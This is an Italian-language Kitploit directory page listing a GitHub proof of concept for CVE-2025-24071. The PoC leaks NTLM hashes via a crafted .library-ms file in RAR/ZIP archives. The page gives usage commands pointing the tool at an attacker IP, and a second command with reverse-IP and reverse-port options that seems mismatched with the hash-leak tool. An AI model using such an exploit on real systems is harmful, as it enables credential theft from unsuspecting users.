Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24071 — Proof-of-concept per CVE-2025-24071, che dimostra la perdita di hash NTLM tramite un file .library-ms appositamente modificato in archivi RAR/ZIP, innescando l'autenticazione SMB all'estrazione. | Kitploit
Strumenti/GitHubGitHub/royall-researchers/cve-2025-24071
RicognizioneAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta Informazioni
GitHubroyall-researchers/cve-2025-24071

CVE-2025-24071

Proof-of-concept per CVE-2025-24071, che dimostra la perdita di hash NTLM tramite un file .library-ms appositamente modificato in archivi RAR/ZIP, innescando l'autenticazione SMB all'estrazione.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
21 anno faNon ancora revisionato
Condividi

CVE-2025-24071_PoC

CVE-2025-24071: Perdita di hash NTLM tramite estrazione RAR/ZIP e file .library-ms

Windows Explorer avvia automaticamente una richiesta di autenticazione SMB quando un file .library-ms viene estratto da un archivio .rar, portando alla divulgazione dell'hash NTLM. L'utente non deve aprire o eseguire il file: è sufficiente estrarlo per attivare la perdita.

utilizzo

root@kitploit:~

>>python poc.py

>>enter file name: your file name

>>enter IP: attacker IP
root@kitploit:~
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888

aggiornamento:

Aggiornamento: Microsoft ha cambiato il suo numero CVE. Il numero CVE precedentemente definito da Microsoft, CVE-2025-24071, è stato aggiornato a CVE-2025-24054.🤷‍♂

Scarica lo strumento